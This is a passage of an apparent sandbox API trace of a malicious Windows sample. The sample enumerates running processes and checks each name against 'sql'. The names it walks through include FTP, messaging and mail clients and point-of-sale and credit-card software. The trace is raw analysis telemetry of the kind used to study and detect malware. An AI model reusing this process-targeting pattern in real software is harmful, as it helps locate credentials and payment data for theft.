CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0127.254] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35967e8 [0127.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x35967e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0127.254] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0127.254] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="sql") returned 0x0 [0127.254] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0127.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0127.255] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e338 [0127.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x357e338, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0127.255] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0127.256] StrStrIA (lpFirst="icq.exe", lpSrch="sql") returned 0x0 [0127.256] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0127.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0127.257] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582f30 [0127.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582f30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0127.257] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0127.257] StrStrIA (lpFirst="leechftp.exe", lpSrch="sql") returned 0x0 [0127.258] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0129.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.280] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582c18 [0129.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582c18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0129.280] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0129.281] StrStrIA (lpFirst="ncftp.exe", lpSrch="sql") returned 0x0 [0129.281] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0129.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.282] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582ae0 [0129.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3582ae0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0129.282] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0129.282] StrStrIA (lpFirst="notepad.exe", lpSrch="sql") returned 0x0 [0129.282] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0129.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0129.283] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3582a20 [0129.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3582a20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0129.283] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0129.283] StrStrIA (lpFirst="operamail.exe", lpSrch="sql") returned 0x0 [0129.283] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0129.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.285] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3582af8 [0129.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3582af8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0129.285] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0129.285] StrStrIA (lpFirst="pidgin.exe", lpSrch="sql") returned 0x0 [0129.285] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0129.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0129.286] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3582dc8 [0129.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582dc8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0129.286] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0129.286] StrStrIA (lpFirst="scriptftp.exe", lpSrch="sql") returned 0x0 [0129.286] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0129.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.287] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582f18 [0129.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3582f18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0129.287] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0129.287] StrStrIA (lpFirst="skype.exe", lpSrch="sql") returned 0x0 [0129.287] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0129.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.289] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35832a8 [0129.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x35832a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0129.289] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0129.289] StrStrIA (lpFirst="smartftp.exe", lpSrch="sql") returned 0x0 [0129.289] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0129.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.290] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583050 [0129.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3583050, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0129.290] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0129.290] StrStrIA (lpFirst="totalcmd.exe", lpSrch="sql") returned 0x0 [0129.290] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0129.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.292] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583188 [0129.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3583188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0129.292] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0129.292] StrStrIA (lpFirst="trillian.exe", lpSrch="sql") returned 0x0 [0129.292] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0129.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.293] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35831a0 [0129.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x35831a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0129.293] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0129.293] StrStrIA (lpFirst="webdrive.exe", lpSrch="sql") returned 0x0 [0129.293] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0129.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.294] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583020 [0129.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3583020, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0129.294] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0129.294] StrStrIA (lpFirst="whatsapp.exe", lpSrch="sql") returned 0x0 [0129.295] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0129.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.296] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583128 [0129.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3583128, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0129.296] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0129.296] StrStrIA (lpFirst="winscp.exe", lpSrch="sql") returned 0x0 [0129.296] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0129.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0129.298] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35968e8 [0129.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x35968e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0129.298] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0129.298] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="sql") returned 0x0 [0129.298] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0129.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0129.299] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3596968 [0129.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3596968, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0129.299] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0129.299] StrStrIA (lpFirst="active-charge.exe", lpSrch="sql") returned 0x0 [0129.299] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0129.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.300] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582ff0 [0129.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3582ff0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0129.300] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0129.300] StrStrIA (lpFirst="accupos.exe", lpSrch="sql") returned 0x0 [0129.301] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0129.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.302] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3583170 [0129.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3583170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0129.302] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0129.302] StrStrIA (lpFirst="afr38.exe", lpSrch="sql") returned 0x0 [0129.302] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0129.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.303] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583068 [0129.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3583068, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0129.303] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0129.303] StrStrIA (lpFirst="aldelo.exe", lpSrch="sql") returned 0x0 [0129.303] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0129.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0129.304] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x35831b8 [0129.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x35831b8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0129.304] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0129.304] StrStrIA (lpFirst="ccv_server.exe", lpSrch="sql") returned 0x0 [0129.304] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0129.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0129.306] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3596768 [0129.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3596768, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0129.306] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0129.306] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="sql") returned 0x0 [0129.306] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0129.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0129.307] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3596a28 [0129.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3596a28, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0129.307] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0129.307] StrStrIA (lpFirst="creditservice.exe", lpSrch="sql") returned 0x0 [0129.307] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0129.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, 